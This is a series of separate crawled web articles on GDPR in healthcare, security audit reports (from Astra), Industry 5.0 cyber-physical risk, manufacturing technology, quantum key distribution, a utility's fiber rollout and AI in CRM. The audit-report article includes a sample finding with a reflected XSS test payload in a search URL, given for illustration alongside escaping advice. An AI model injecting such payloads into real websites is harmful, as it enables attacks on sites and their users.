Data protection regulations define how an individual’s personal information can be used by organizations, businesses and government. These regulations also contain safeguards that seek to ensure healthcare data is not susceptible to attack, misuse or misappropriation. As most know, misusing an individual’s healthcare data or not properly following regulation guidelines can hold especially serious long-term consequences. This spring, the GDPR was adopted with the aim of having one set of rules applicable throughout the European Union (EU). This has significant implications not only for EU-based organizations, but also for non-EU based organizations that conduct business or business communications in EU countries. The GDPR further aims to ensure privacy by design or default, meaning that data protection measures must be implemented across all data processing activities and endpoints. These changes are not revolutionary; the key principles, concepts and themes of the current data protection system remain. The new rules build on what is already in place with the addition of several new requirements. The Healthcare industry is facing multiple challenges when it comes to protecting sensitive data. This paper provides an overview of how the recent EU General Data Protection Regulations will affect healthcare organizations. | <urn:uuid:d432d755-acde-4c23-8075-91b020cd50cb> | CC-MAIN-2022-40 | https://em360tech.com/continuity/white-papers/healthcare-organizations-know-gdpr | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00394.warc.gz | en | 0.914554 | 243 | 2.640625 | 3 |
In today’s world, where a huge amount of information is generated across multiple platforms, all organizations need to ensure that their information is safe from all kinds of cyber threats. The biggest risk organizations face is weak cyber security. According to a report by the ITRC, the number of data breaches has already exceeded the total number of data compromises recorded in 2020 by 17 percent.
Cyber security is a major concern for a lot of organizations today. Organizations are losing millions of dollars every year due to data breaches. The situation is getting worse each day as businesses are not aware of the latest techniques used by hackers. This makes understanding a security audit report all the more important.
Hackers are using sophisticated techniques to bypass apps and networks to steal confidential data. Organizations must conduct regular security audits to make sure that confidential data is not leaked to hackers.
What is a Security Audit?
It’s no secret that most businesses use the Internet for communicating, storing data, and doing business. However, it’s also no secret that many cybercriminals out there are looking to access this data for their gain. Therefore, it pays to understand the best ways to protect your business from these cybercriminals.
The security audit is a comprehensive assessment of a business or organization’s security policies, procedures, and technologies. The security audit is a fact-finding mission to investigate a company’s network and information security practices.
The objective of a security audit is to identify vulnerabilities and make recommendations to the business. Performing security audits makes businesses more secure against security breaches and data loss. A security audit involves a detailed examination of a business's security policies, procedures, and technologies.
A security audit may be performed by a third party or by the business itself and it does not necessarily have to be a one-time activity. A business can opt for a security audit on a periodic basis.
5 Common IT Security Audit Standards
The auditing process is critical for maintaining compliance with IT security standards. Still, the sheer volume of standards out there is enough to make even the most seasoned audit professionals lose sleep at night.
But the good news is that most of the standards are in some way interconnected. That means that you can comply with multiple standards in many cases by following the same audit protocol.
For example, if you are following one of the ISO standards, you are already at least partially compliant with several other key security standards, since many of them map directly to the ISO requirements.
Let’s find out some common compliance standards:
1. ISO 27001
ISO 27001 is the International Standard for Information Technology – Security techniques – Information security management systems – Requirements. ISO 27001 is an information security management standard that enables an organization to improve its security posture.
There are many ways to improve your information security posture. Still, this standard provides a framework of best practices that can make it easier for your organization to identify, analyze, and manage the risks of your information assets.
2. PCI DSS Compliance
PCI DSS is a set of 12 requirements that specifically target how organizations store, process, and transmit cardholder data. The Payment Card Industry Security Standards Council (PCI SSC) developed the PCI DSS to protect against credit card fraud.
The PCI Security Standards Council (PCI SSC) maintains the PCI DSS, the de facto global standard for organizations that handle credit card information. The PCI DSS applies to any organization that stores, processes, or transmits cardholder data, which includes elements such as the primary account number (PAN), the cardholder's name, the card's expiration date, and the service code.
Related Read: Woocommerce Security Audit
3. NIST Cyber-Security Framework
The NIST Cyber-Security Framework (NIST CSF) defines a set of best practices that enables IT organizations to more effectively manage cybersecurity risks. The NIST CSF promotes the use of risk management as a means to achieve organizational objectives for cybersecurity.
The NIST CSF is a voluntary, risk-based approach to cybersecurity and offers flexible and repeatable processes and controls tailored to an organization’s needs. The NIST CSF is a set of standards and guidelines that federal agencies can use to comply with the Federal Information Security Modernization Act (FISMA).
Learn more about NIST Security Audit
4. SOC 2
SOC 2 is an auditing procedure that ensures your service providers securely manage your data to protect the interests of your organization and the privacy of its clients. This compliance is necessary to meet the standards of your organization’s clients and to stay compliant with the industry standards.
SOC 2 compliance ensures the security of your company’s information assets and protects the interests of your organization. It is a certification of trust, which says that your company protects the type of information that is considered personal and private. SOC 2 is one of the most widely used standards for third-party service providers, and is an absolute must for any organization that is looking to be compliant with the industry standards.
5. HIPAA
The Health Insurance Portability and Accountability Act (HIPAA) is a federal law that requires covered entities to protect the confidentiality, integrity, and availability of electronic health information that they create, receive, maintain, or transmit.
HIPAA protects the privacy and security of health information and sets national standards for how health care providers, health plans, and health care clearinghouses and their business associates must work together and with covered entities to ensure the safety and privacy of personal health information.
Why do you need a Security Audit Report?
A security audit report can be defined as a comprehensive document containing a security assessment of a business or an organization. It aims to identify the weaknesses and loopholes in the security of the organization, and therefore, it is an important document that can help an organization secure itself.
The security audit report is one of the most important documents used to assess the strengths and weaknesses of the security of an organization.
A security audit report typically lists all the audit team’s findings, which can be in the form of misconfiguration errors, vulnerabilities, or any other security defects in a system. The audit report also recommends remediation actions to the respective management to improve the security of their organization.
Some other use cases of security audit reports are:
- Compliance and Standards
- Global and local laws
- Customer Trust and Reputation
Key Components of Security Audit Report
One of the main goals of any audit is to provide actionable feedback so that the client can work towards improving their security. This feedback comes in the form of the report generated at the end of the test.
A security audit report may contain several different sections. There can be a section with information about the deliverables, audit scope, timelines, details about the testing process, findings, recommendations, etc.
Although there are many different types of penetration tests or hybrid application analysis, they all share key components of a security audit report mentioned below:
1. Title
The title of the security audit report.
2. Table of Contents
The table of contents is an essential part of the audit reports. They provide a quick and convenient way to view the most important information in the report.
The table of contents is especially useful in large and detailed audit reports. It helps to quickly locate any detailed information, such as the auditor’s name, the scope of the audit, the date of the audit, and the number of pages in the audit report.
3. Scope of Audit
Scope of audit refers to a broad description of what is included in a project or the scope of a contract. In the scope of work, the project manager and other stakeholders identify the work needed to accomplish the project purpose.
4. Description
The description section in the security audit report is the detailed technical description of the security risk; a minimal example of such a finding is shown after this list. The description contains:
- All relevant details about the issue
- How to reproduce the issue
- How easily can a hacker exploit it
- The severity of the issue
- CVSS Score of the vulnerability
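To make these fields concrete, here is a hypothetical example (in Python) of how a single finding might be recorded; the field names and values are purely illustrative and do not represent any particular vendor's report format.

```python
# A hypothetical record for one finding in a security audit report.
finding = {
    "title": "Reflected XSS in the search parameter",
    "description": "User input from the 'q' parameter is echoed into the page "
                   "without encoding, allowing script injection.",
    "steps_to_reproduce": [
        "Log in as a regular user.",
        "Open /search?q=<script>alert(1)</script>.",
        "Observe that the script executes in the browser.",
    ],
    "exploitability": "Easy - no authentication required",
    "severity": "High",
    "cvss_score": 7.1,  # CVSS v3.1 base score, illustrative
    "recommendation": "Encode output and add a WAF rule for the affected endpoint.",
    "references": ["https://owasp.org/www-community/attacks/xss/"],
}
```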
5. Recommendations
The recommendation section contains details about the fix or patch that needs to be applied to mitigate the security risk. The appropriate fix depends on the type of security vulnerability.
For example, developers can mitigate an XSS flaw by escaping or encoding user-controlled output and by using a WAF; if the flaw stems from an outdated jQuery version, upgrading the library prevents it.
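As a minimal sketch of the escaping approach (framework-agnostic, using only Python's standard library), the snippet below HTML-encodes untrusted input before inserting it into a page; real applications would typically rely on their template engine's automatic escaping instead.

```python
from html import escape

def render_search_results(user_query: str) -> str:
    # Encode the untrusted value so characters like < > & " cannot break out
    # of the HTML context and run as script.
    safe_query = escape(user_query, quote=True)
    return f"<p>Results for: {safe_query}</p>"

print(render_search_results("<script>alert(1)</script>"))
# <p>Results for: &lt;script&gt;alert(1)&lt;/script&gt;</p>
```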
6. References
References are important from a company's point of view. A reference could be a blog post, a news item, a whitepaper, or any informative material that helps the company better understand the vulnerability and its fix.
Who prepares a Security Audit Report?
A security audit report is prepared by a team of security auditors (Internal or External) who performs an audit on businesses or their websites to ensure that the business is compliant with the industry standards and regulations.
In most cases, organizations hire external security auditors to perform an audit, and they prepare a security audit report.
External security auditors are a very important aspect of any organization opting for a security audit by a third-party vendor. The organization should consider a well-known or reputed vendor that has prior experience and trust factor in the industry.
The purpose of an audit could be to determine the organization’s risk, provide advice leading to improvements, test the controls in place, provide assurance that the organization is following an established set of procedures, etc.
Organizations may perform a security review for various reasons, including meeting compliance requirements, gaining a better understanding of an organization’s security posture, or improving the overall security.
Reading Guide: How Much Does an IT Security Audit Cost?
How does Astra help you get a security audit report?
Cyber security has become a major concern for organizations. Hackers and cybercriminals increasingly break into websites, databases, and servers, compromise company accounts, and steal critical information. So, it is very important to keep track of everything that is going on in your company.
Astra is a cybersecurity firm offering a range of high-end cyber security services and solutions, including security audits, penetration testing, vulnerability assessment and scanning, malware removal, and a website firewall.
Astra has a team of world-class security experts who work round the clock to keep clients secure from hackers. Astra’s team is one of the best in the industry and has successfully conducted many security audits for a wide range of clients.
Related Read: PHP Penetration Testing
Key Highlights in Astra’s Security Audit Report
Astra’s Security Audit Report has the following key features:
1. Industry Standard Security Testing
Astra's security specialists perform industry-standard security testing with more than 2,500 tests that follow OWASP, SANS, ISO, and CREST guidelines and compliance requirements.
2. Detailed Vulnerability Analysis
Astra’s Security Scan dashboard and pen-test report show a detailed analysis of vulnerabilities, including the impact, severity, CVSS score, affected parameters, and steps to reproduce each vulnerability with video proofs-of-concept (PoCs).
3. Steps to Fix Vulnerabilities
Each vulnerability has a section within the report that describes it in detail, explains how to fix the flaw, and provides an overview of each mitigation with concrete steps to fix it (including references to external informative resources).
4. Easy to access
The report can be downloaded easily from Astra's main Pentest dashboard. You can download the report as a PDF or have it delivered by email.
After a penetration test or a security audit, the first thing a client would ask for is the findings from the security audit report. This report must be a comprehensive security report that should include the entire audit process, vulnerability details, testing methodologies, any other findings, and finally recommendations on how to prevent the vulnerability as well as the steps to fix it. Security issues can be a real pain in the neck, but Astra can help you fix your problems.
1. How Much Does an IT Security Audit Cost?
The cost of an IT security audit varies according to the scope and depth of the audit.
2. Why do you need a Security Audit Report?
A security audit report lists all the existing vulnerabilities and categorizes them according to severity. It also provides you with the necessary measures to fix those issues.
3. How does Astra help you get a security audit report?
Astra Security has an interactive and collaborative security audit reporting procedure. Not only do you get a detailed PDF report along with video POCs on how to reproduce vulnerabilities, but you also get expert assistance from security engineers at Astra while working on the issues.
4. Do I also get rescans after a vulnerability is fixed?
Yes, depending on your plan you get 1-3 rescans. You can use these rescans within 30 days of the initial pentest's completion.
Over more than 300 years, a series of industrial revolutions has transformed the way we live for the better. Each era has been marked by the introduction of mechanization that has accelerated the creation and delivery of goods and services at scale and at lower cost. The journey has required tremendous innovation to fuel an advanced global economy and has made life as we know it possible. However, it has also introduced risk, initially to personal safety, then to networks and systems, and eventually the two merged to introduce cyber-physical risk.
Today, we sit on the cusp of the next industrial age—Industry 5.0, which presents additional opportunities for better business outcomes, but also new, more dangerous risks organizations have never experienced before. Let's take a brief look back at the historical context of how we got here and what's required to better protect an ever-expanding ecosystem of connected systems and devices that critical infrastructure, healthcare organizations, and enterprises rely on.
The first industrial revolution emerged in the 1700s, when humans began harnessing steam power to dramatically enhance industrial productivity. Mechanization simplified farming, accelerated the manufacture of textiles and clothing, and set the stage for the next era of industrial change with the drilling of the first oil well around 1860.
In the late 1800s and early 1900s, innovations such as electricity and assembly line production enabled goods to be produced faster, on a larger scale, and at a lower cost. It was also the era of "planes, trains, and automobiles." A series of firsts provided a glimpse into a future where mobility was affordable and movement of goods and people across vast distances could happen in a matter of hours. A network of telephone lines across the United States further removed distance barriers, making it possible to communicate instantly.
During these first two periods of industrial revolution, workers' personal safety was at heightened risk. Machinery and power sources required human intervention to operate and monitor them with few, if any, safety mechanisms in place. In the early 1900s, progress in the form of federal regulations and workers' compensation to drive improvements in workplace conditions and safety were introduced and accident rates began to fall. Then came automation along with network connectivity and the nature of risks changed.
Beginning in the 1970s, developments such as programmable logic controllers (PLCs) and partial automation enabled certain industrial processes to be carried out without human assistance. Industrial control systems (ICS) networks emerged to run the world's infrastructure, and supervisory control and data acquisition (SCADA) systems helped engineers collect, analyze, and visualize data to optimize operations for efficiency and productivity gains. The advent of the internet and network connectivity introduced a new type of risk to organizations—cyber threats.
Industrial assets have long life cycles and lack modern security controls. However, because operational technology (OT) networks were initially isolated from IT networks, the risk of a targeted cyberattack was negligible. Threat actors were not yet at the stage where they were openly targeting these networks to inflict physical damage. The level of effort required was simply too great when there was already ample opportunity to create havoc and reap rewards by targeting IT networks and systems.
The fourth industrial revolution puts technology at the forefront, connecting the automated technologies introduced during Industry 3.0 to the broader enterprise IT network, as well as the internet. This digitization of manufacturing—characterized by cyber-physical systems and the Industrial Internet of Things (IIoT)—has been a game changer, giving rise to the "smart factory." Leveraging artificial intelligence, machine learning, and real-time data, this newfound interconnectivity between factory machinery and the cyber world has enabled the optimization of physical processes, operational resilience, supply chains, and business agility.
Despite its many benefits, Industry 4.0 has exposed industrial assets to cyber risk that they were never designed to be able to combat. As these assets began to connect to IT systems, their unguarded exposure and the potential for significant damage made these networks attractive targets for cyberattacks. It is for this reason that Claroty was founded in 2015.
Adversaries understand the importance of OT networks and during Industry 4.0 began to attack them boldly to wreak havoc. The cyberattacks on the Ukraine power grid in December 2015 and December 2016 were among the first elements of proof of threat actors targeting critical infrastructure. The second wave came with WannaCry and subsequently NotPetya, which was devised to spread quickly and indiscriminately. The widespread, collateral damage to OT networks and disruption to operations revealed to security professionals just how poor the cyber risk posture of their OT networks was and prompted swift actions in many of the largest companies.
Since the onset of the COVID-19 pandemic, the acceleration of digital transformation and remote access across all critical infrastructure sectors has compressed years of industrial change into months. A "newer" wave of attacks that take advantage of cyber-physical integration and a proliferation of connected devices is different in severity and priority because they put lives and livelihoods at risk. While attacks on IT networks and data breaches that began decades earlier are very costly and have other financial implications, they don't threaten the physical world we live in and the systems we depend on, as do attacks against hospitals, oil pipelines, and other types of critical infrastructure. The 2021 incidents involving Colonial Pipeline, JBS Foods, the Oldsmar, Florida water supply (just to name a few) brought this into sharp focus.
Although organizations cannot prevent bad actors from targeting them, they can make it harder for these actors to achieve their mission and thus move on to easier targets. For years, The Claroty Platform has been helping organizations identify, manage, and protect their OT assets and a range of connected devices.
We now sit at the brink of the fifth industrial revolution, which will build upon the inter-machine connectivity of Industry 4.0 by enhancing human-machine interaction. Industry 5.0 recognizes that human creativity and critical thinking cannot be replicated by machines. As such, ongoing innovation strives to optimize processes by delegating repetitive or predictable tasks to automation while also integrating human operators into production processes.
In this new industrial revolution, the IT-OT convergence that began under Industry 4.0 continues to grow in terms of scope and intensity to form the Extended Internet of Things (XIoT), which holistically refers to the increasingly complex and varied set of connected devices within enterprise networks, including the following asset categories:
Industrial IoT (IIoT) and operational technology (OT) assets, which handle all cyber-physical processes and equipment, such as the programmable logic controllers (PLCs) that support critical processes in industrial environments. These systems are connected internally to workstations that can typically be accessed remotely for maintenance; other cyber components include IIoT devices such as smart sensors. The 16 critical infrastructure sectors as defined by CISA—from manufacturing to energy to transportation—rely on these interconnected processes and systems.
Healthcare IoT assets, including medical imaging equipment such as MRI machines and CT scanners, as well as internet of medical things (IoMT) devices such as smart vitals monitors and infusion pumps that support critical care delivery in healthcare environments. These systems are usually connected to an organization's IT networks.
All other IoT devices used in smart cities, smart grids, enterprise IoT environments, building management systems (BMS), and any kind of "smart" technology assets.
Industry 5.0 steps up to deliver additional top-line and bottom-line benefits modern enterprises are prioritizing, including sustainability, better customer experiences, and greater profitability. At the same time, the extensiveness of convergence and expanding ecosystem of devices, makes the implementation of strong network segmentation and a strong cybersecurity program that covers all network assets fundamental for modern enterprises.
Think about the following scenarios that have already occurred:
A ransomware attack on a hospital may have led to the death of a baby, since healthcare workers didn't have access to medical equipment and devices they usually rely on to monitor birth progress.
Threat actors infiltrated a high-tech breakroom vending machine with unfettered access to an OT network worth billions of dollars, to propagate malware across multiple sites.
Vulnerabilities in a wi-fi module used in embedded devices for industries like agriculture, automotive, energy, gaming, industrial, and security allowed threat actors in the proximity of the module to bypass the wi-fi network password and completely take over the device.
At Claroty, we are building a future where cyber and physical worlds safely connect to support our lives, covering all types of connected assets that comprise the XIoT. Learn more about how we are advancing our mission to help organizations position themselves to participate in Industry 5.0 and unlock better business outcomes while building resilience to defend against evolving cyber threats. | <urn:uuid:52d742cd-ba49-4de0-a32f-5a8398b72f43> | CC-MAIN-2022-40 | https://claroty.com/blog/industry-5-0-and-the-extended-internet-of-things-xiot-a-historical-context | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337680.35/warc/CC-MAIN-20221005234659-20221006024659-00394.warc.gz | en | 0.957104 | 1,791 | 3.46875 | 3 |
Infographic: What Technology Do Manufacturers Use?
Manufacturing as an industry has been experiencing growing digitization, with organizations implementing tools and solutions that enable the more effective leveraging of data and the use of smart devices in operations.
This convergence of manufacturing practices and digital technology is most commonly referred to as Industry 4.0, which is the driving force behind many of the changes we’ve seen in manufacturing in recent years.
Related Post: What Is Industry 4.0?
By using technology in business operations, manufacturers can see improvements and growth in a number of different areas, whether it’s supply chain management (SCM), customer experience, or business process automation.
With this infographic, you can see what technology manufacturers are investing in and utilizing, and get a better understanding of what they are using it for.
Industry 4.0 is a major competitive differentiator for organizations in 2022, and the disruption caused by the use of its associated technology is broadly acknowledged by those in the industry.
Just 9% of organizations have updated their business models to prepare for Industry 4.0, but among companies that have experienced growth of at least 20%, that figure rises to 30%.
And yet, many manufacturers have been slow to adopt new practices and solutions that take advantage of the benefits they can provide.
That is changing, however. Consider sensors, to take a common example of digital transformation in manufacturing.
Sensors can be applied on factory floors to feed data and information to software systems, which can then analyze that data and provide stakeholders with information that can be acted on in real-time.
This particular use case has been pursued by organizations looking to reduce maintenance and repair costs for their machinery, but sensors and smart devices can be used for any number of purposes, such as workflow streamlining, logistics fulfillment tracking, factory floor compliance, and quality control.
Observations of digital maintenance and reliability transformations in heavy industries reveal the potential for companies to increase asset availability by 5 to 15% and reduce maintenance costs by 18 to 25%.
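As a simplified illustration of how streamed sensor readings can be turned into a maintenance signal, the Python sketch below flags readings that drift far from a rolling baseline. The window size, tolerance, and sample data are arbitrary assumptions rather than values from any particular factory system.

```python
from collections import deque

def detect_anomalies(readings, window=20, tolerance=3.0):
    """Flag readings that deviate strongly from the rolling mean of recent values."""
    recent = deque(maxlen=window)
    alerts = []
    for i, value in enumerate(readings):
        if len(recent) == recent.maxlen:
            mean = sum(recent) / len(recent)
            std = (sum((x - mean) ** 2 for x in recent) / len(recent)) ** 0.5
            if std > 0 and abs(value - mean) > tolerance * std:
                alerts.append((i, value))  # candidate for a maintenance inspection
        recent.append(value)
    return alerts

# Example: a vibration sensor that spikes at the end of the series.
vibration = [1.0 + 0.01 * (i % 5) for i in range(100)] + [2.5]
print(detect_anomalies(vibration))  # [(100, 2.5)]
```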
It should come as little surprise, therefore, to learn that the global smart sensor market is anticipated to grow quickly, from an estimated $36.6 billion in 2020 to $87.6 billion in 2025 at a CAGR of 19%.
Technologies like this that aid in the utilization of data and technology are drastically shifting the direction of digitization in the manufacturing industry.
Now let’s go more in-depth into each of the technologies that are most important to manufacturers.
71% of manufacturers currently employ data analysis in their operations.
The use of data analysis in manufacturing provides several benefits that can help organizations better manage their operations.
These benefits broadly include:
- Demand forecasting
- Order fulfillment
- Supplier performance
- Quality control
- Inventory management
- Machine reliability monitoring
Much of the data necessary to more effectively perform these processes is already available to companies—they’re just failing to utilize it for analysis.
Up to 73% of company data is unused by businesses.
Increased use of this data, through the adoption of analytics platforms like PowerBI, allows companies to leverage previously unused data for the benefit of their operations.
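To ground the demand-forecasting benefit listed above, here is a deliberately simple example of the kind of calculation an analytics platform automates at much larger scale — a moving-average forecast over monthly order volumes. The figures are invented for illustration.

```python
def moving_average_forecast(history, window=3):
    """Forecast the next period as the average of the last `window` periods."""
    if len(history) < window:
        raise ValueError("Not enough history for the chosen window")
    return sum(history[-window:]) / window

monthly_orders = [120, 135, 128, 142, 150, 158]  # illustrative demand history
print(moving_average_forecast(monthly_orders))   # 150.0
```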
99% of manufacturers use (64%) or plan to use (35%) cloud computing in their operations.
In order to conduct data analysis and make effective use of other modern technologies, organizations require a tech infrastructure that is able to handle large data sets and be scalable.
Cloud solutions are today highly sought-after by businesses, particularly SMBs, because the barrier of entry is low—that is, overheads on physical hardware are not necessary—and they are easily scalable if more users, power, or storage is needed.
Because of this, cloud computing services and their use in manufacturing is receiving a lot of interest among businesses, much in line with other industries that are also migrating their operations and data to the cloud.
Enterprise Resource Planning (ERP)
58% of manufacturers use ERP systems.
ERP solutions are necessary for modern businesses to avoid becoming siloed.
Siloing refers to a process in which systems containing data become detached from one another, often because departmental solutions lack integrations; the result is that information is used inefficiently within the company.
ERPs allow individual solutions and modules, which are integrated into a single platform, offering the opportunity to share data and information more effectively.
Robotic Process Automation (RPA)
43% of manufacturers already use robotic process automation, while a further 43% plan to deploy RPA initiatives.
RPA can be used for a variety of purposes—most commonly to automate workflows and business processes that otherwise require a substantial amount of manual labor.
In manufacturing, RPA can be used to improve compliance, automate quality assurance processes, and facilitate order fulfillment.
As organizations look to streamline their processes and remove unnecessary costs in their operations, technologies like RPA will become a common fixture in manufacturing enterprises.
Internet of Things (IoT)
40% of manufacturers currently deploy IoT technology, while a further 47% plan to do so.
The Internet of Things in manufacturing is referred to as the “Industrial Internet of Things (IIoT)”.
IoT devices, as we noted in the case of how sensors can be used, are being used in increasing volumes as manufacturers look to combine the power of the cloud, the strength of data analysis platforms, and the large data sets generated by smart devices.
As companies learn how to efficiently leverage smart devices and the data that is generated from them, the importance of the IIoT will continue to grow.
Modern technology used by manufacturers varies widely in its uses and applications.
The most significant technologies, in terms of adoption today, concern the application and leveraging of data and the implementation of devices and hardware that can bridge the gap between the factory floor and the insights delivered to stakeholders.
As Industry 4.0 continues to play a large role in shaping how the operations of manufacturers are conducted, we can expect to see greater adoption of these key technologies in coming years.
If you are in need of digital solutions for your manufacturing organization, consider taking a look at our Digital Innovation service and learn how you can leverage technology for your business goals. | <urn:uuid:5ff90e2a-411d-4acd-8dcf-6157b2102206> | CC-MAIN-2022-40 | https://www.impactmybiz.com/blog/what-technology-do-manufacturers-use/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00594.warc.gz | en | 0.947991 | 1,307 | 2.71875 | 3 |
Quantum Key Distribution (QKD) represents the next generation of cybersecurity for the government. By leveraging quantum mechanics to distribute encryption keys, two endpoints in different locations can exchange encrypted files in seconds. These files are safe because hackers cannot steal the encryption keys without being detected. Considered to be the most secure form of information sharing, QKD pairs instant threat detection with Zero Trust Architecture to notify teams when a threat is detected.
In the government arena, QKD is highly effective and will be an important tool in the cybersecurity defense of our nation, and many countries in Europe and Asia are paving the way for implementations in the U.S. These were the key themes of our recent Government Technology Insider “Quantum Key Distribution: Securing Future Network Communications” podcast interview where Lee Sattler, Distinguished Engineer at Verizon, broke down the fundamentals of QKD.
“Quantum Key Distribution leverages the properties of quantum mechanics,” said Sattler. “With QKD, we are encoding information on a single photon, and this is how we can apply the quantum mechanical properties to provide security. We can actually detect when someone is trying to eavesdrop on a QKD line, which is possible because of quantum mechanics laws.”
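To illustrate the eavesdropping-detection property Sattler describes, here is a toy Python simulation loosely based on the BB84 protocol (not a description of Verizon's system): the sender encodes random bits in random bases, the receiver measures in random bases, and an eavesdropper who guesses the wrong basis introduces errors that the two parties can detect by comparing a sample of their sifted key.

```python
import random

def bb84_error_rate(n_bits=2000, eavesdrop=False):
    alice_bits  = [random.randint(0, 1) for _ in range(n_bits)]
    alice_bases = [random.randint(0, 1) for _ in range(n_bits)]  # 0 = rectilinear, 1 = diagonal
    bob_bases   = [random.randint(0, 1) for _ in range(n_bits)]

    received = []
    for bit, a_basis, b_basis in zip(alice_bits, alice_bases, bob_bases):
        value, basis = bit, a_basis
        if eavesdrop:
            eve_basis = random.randint(0, 1)
            if eve_basis != basis:        # wrong basis: the measurement randomizes the bit
                value = random.randint(0, 1)
            basis = eve_basis             # the photon is re-sent in Eve's basis
        if b_basis != basis:              # Bob in the wrong basis also gets a random result
            value = random.randint(0, 1)
        received.append(value)

    # Keep only positions where Alice's and Bob's bases matched (the sifted key),
    # then estimate the error rate by comparing the two copies.
    sifted = [(a, b) for a, b, x, y in zip(alice_bits, received, alice_bases, bob_bases) if x == y]
    return sum(1 for a, b in sifted if a != b) / len(sifted)

print(f"error rate without eavesdropper: {bb84_error_rate():.1%}")               # ~0%
print(f"error rate with eavesdropper:    {bb84_error_rate(eavesdrop=True):.1%}")  # ~25%
```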
Listen to the full podcast below: | <urn:uuid:d176441f-bdc5-4d82-9eac-5dcbfef99727> | CC-MAIN-2022-40 | http://governmenttechnologyinsider.com/quantum-key-distribution-podcast-on-securing-future-network-communications/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00594.warc.gz | en | 0.897661 | 273 | 2.78125 | 3 |
The Bangalore Electricity Supply Company (BESCOM) is planning to start building its own fiber-optic network in the city. The new cables will be laid along with the underground power cables that the electricity company install as part of its effort to bring safety, security, and aesthetics to the city landscapes.
Bangalore, the Silicon Valley of India in the southern state of Karnataka, is a crowded city where aging electrical infrastructure poses a threat to the public. BESCOM's initiative to lay power cables and fiber-optic cables together will improve safety for pedestrians. Apart from that, BESCOM can use the optical fibers for its own purposes and is also considering leasing capacity to other service providers.
BESCOM Managing Director C. Shikha said the decision to include deployment of optical fiber cables along with underground electrical cables was taken because the process will yield better returns at minimal extra cost. The project will be undertaken over the next three years. Deploying fiber along power transmission cables and leasing it to generate extra revenue is something new for electricity companies in India. The current strategy would make BESCOM the first government-owned electricity distribution company to have its own communication system.
BESCOM officials said that the optical fiber cables are essential components in the implementation of the R-APDRP project, which involves data acquisition, processing, and management, as well as for the Smart Grid System.
The project for underground installation of power transmission cables for Bangalore city was announced in the Karnataka State budget in 2018 and was pitched as a solution to increase quality and reliability of power supply, reduction in transmission and distribution losses, reduction in unauthorized connections due to tampering and decrease in the number of accidents due to snapping of overhead lines, among others.
What is the R-APDRP Project?
In order to bring reforms to the Power Sector, the Central Ministry of Power has launched the Restructured Accelerated Power Development and Reforms Program (R-APDRP). The scheme is a Central sector scheme launched in July 2008.
The focus of the program is on actual, demonstrable performance in terms of:
– AT&C loss reduction
– Establishment of reliable and automated sustainable systems for the collection of baseline data
– Adoption of information technology in the areas of energy accounting
– Consumer care and strengthening of Distribution network of State Power Utilities.
The R-APDRP scheme envisages the establishment of a supervisory control & data acquisition system and distribution management system in large towns. | <urn:uuid:eff5bca8-56bb-4e15-92d3-50193ea343e8> | CC-MAIN-2022-40 | https://www.fomsn.com/fiber-optic-news/sobhana/bescom-to-build-own-fiber-network/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00594.warc.gz | en | 0.944415 | 513 | 2.546875 | 3 |
You don’t have to be entrenched in the tech world to have heard the term, “artificial intelligence,” but what is artificial intelligence, or AI, as it’s commonly known? Simply put, AI is the simulation of human intelligence processes performed by machines or computer systems.
Nowadays, AI is being used to carry out many jobs previously held by humans, and while this concept may sound futuristic and even scary to many, there’s no need to panic. Most AI functions are designed to make life easier.
Whether you know it or not, most of us use AI in some form every day. Only 33 percent of people think they use AI, according to one study, but in reality more than 77 percent use some form of AI-powered devices or services.
For example, AI is used by most banks to personalize your experience on their mobile apps, while music services use AI to track your listening habits and then use that data to suggest other songs you may like to hear.
AI and Predictive Lead Scoring
As it relates to business, AI can be beneficial when used in systems and applications by automating repetitive, menial tasks that people used to do manually, thereby increasing company productivity and profitability.
More specifically, sales and marketing tools such as customer relationship management (CRM) software or sales automation platforms that contain AI technology not only can do simple, tedious tasks such as data entry, but also can identify patterns and trends in that data in just seconds, and tell users how best to use it.
With real-time information, sales teams become better equipped to service customers, respond to requests or challenges, and even predict customer buying behaviors. Understanding customer expectations and knowing how to manage them in advance is important not only for the timely delivery of existing products, but also for the promotion of new ones that customers may want or need downstream.
One such ability AI can offer a CRM is predictive lead scoring. Lead scoring is a way businesses and organizations identify and prioritize the highest-quality leads for their salespeople to connect with through a type of scoring system. As a business grows, this helps salespeople manage their time and pursue those leads that make the most sense.
Lead scoring with AI uses algorithms instead of people to predict which leads in a business’ database are qualified. Not all parameters are the same when predicting lead scores. AI easily can factor in information such as forms completed on your website, behavioral data, social media information, demographics, and even external information posted about your company.
With AI for predictive lead scoring, algorithms evaluate what information your customers have in common, as well as what information your leads that did not convert have in common. From there, the algorithm determines a formula that will organize leads for you automatically, so you easily can identify the most qualified ones. Imagine having to do this manually, and you can understand why AI is important for predictive lead scoring.
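A stripped-down version of this idea can be expressed in a few lines: train a model on past leads that did or did not convert, then use it to score new leads. The features and the library choice (scikit-learn) are illustrative assumptions; a production CRM would draw on far richer behavioral and demographic signals.

```python
from sklearn.linear_model import LogisticRegression

# Illustrative features per lead: [pages_visited, forms_completed, emails_opened]
past_leads = [
    [2, 0, 1], [15, 2, 8], [1, 0, 0], [12, 1, 6],
    [3, 0, 2], [20, 3, 10], [4, 1, 1], [18, 2, 7],
]
converted = [0, 1, 0, 1, 0, 1, 0, 1]  # whether each past lead became a customer

model = LogisticRegression().fit(past_leads, converted)

new_leads = {"lead_a": [16, 2, 9], "lead_b": [2, 0, 1]}
for name, features in new_leads.items():
    score = model.predict_proba([features])[0][1]  # estimated probability of conversion
    print(f"{name}: {score:.0%}")
```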
AI and Sales Forecasting
Along the same lines is the use of AI in sales forecasting. Sales forecasting is the process of estimating or looking ahead to sales downstream. Accurate sales forecasts can help companies make data-driven business decisions and predict performance both in the short and long term.
Sales forecasts can be based on industry comparisons, market trends, or even past sales data. With AI, companies can gain a better understanding of future revenue, improve resource allocation, better align teams with objectives, and calculate growth models.
If setting prediction parameters around your sales pipeline is difficult or unclear, or if sales forecasting is inaccurate, despite lots of legacy or current CRM data, you may need AI support in this regard.
AI and Natural Language Processing
